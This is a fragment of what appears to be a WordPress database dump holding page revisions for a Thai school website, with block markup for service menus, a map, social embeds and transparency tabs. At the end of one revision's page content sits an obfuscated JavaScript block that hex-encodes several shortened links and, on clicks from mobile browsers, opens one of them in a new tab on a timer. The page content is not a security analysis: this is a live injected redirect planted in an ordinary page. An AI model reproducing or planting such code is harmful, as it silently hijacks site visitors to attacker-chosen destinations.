{\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_c20813-1f\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_c20813-1f\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_cc83b8-a1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_cc83b8-a1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-20 20:04:44','2024-08-20 13:04:44','',14,'http://pakhaeng.ssk.in.th/?p=1013',0,'revision','',0),
(1015,1,'2024-08-20 20:06:44','2024-08-20 13:06:44','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":892,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post-2.png\" alt=\"\" title=\"Is It a Gift Instagram Post\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"layout\":\"vtabs\",\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#8ed1fc\",\"titleBgHover\":\"#8ed1fc\",\"titleBgActive\":\"#0693e3\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-1 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item 